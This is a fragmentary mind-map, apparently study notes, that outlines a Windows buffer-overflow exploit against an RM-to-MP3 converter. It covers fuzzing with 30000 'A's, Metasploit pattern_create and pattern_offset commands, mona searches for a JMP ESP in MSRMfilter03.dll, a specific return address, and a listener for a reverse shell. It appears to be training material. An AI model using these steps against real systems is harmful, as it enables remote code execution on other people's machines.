Please enable JavaScript.
Coggle requires JavaScript to display documents.
Windows Buffer Overflow (Procedure (Open Kali Linux (In a Terminal window,…
Windows Buffer Overflow
-
-
Procedure
-
- Attach Rm2Mp3l with Immunity Debugger
- In a Terminal window, execute this command:
-
- attack = 'A' * 30000
print attack
- Convert .py file into m3u using terminal
- copy exploit.m3u to windows
upload it in Rm 2 MP3
- create pattern for 30000 "A"
/usr/bin/msf-pattern_create -l 30000
- copy pattern into exploit.py
-
- Find EIP
Copy the value of EIP
- find offset of that EIP
/usr/bin/msf-pattern_offset -q EIP VALUE -l 30000
- Copy the Offset Value into exploit.py
- Once the Program crushesh Find !mona Modules "MSRMfilter03.dll"
- !mona jmp -r esp -m MSRMfilter03.dll
- Copy the Address which is
0x1001b058
-
- start Lisnting on port which already given in Shell
-
-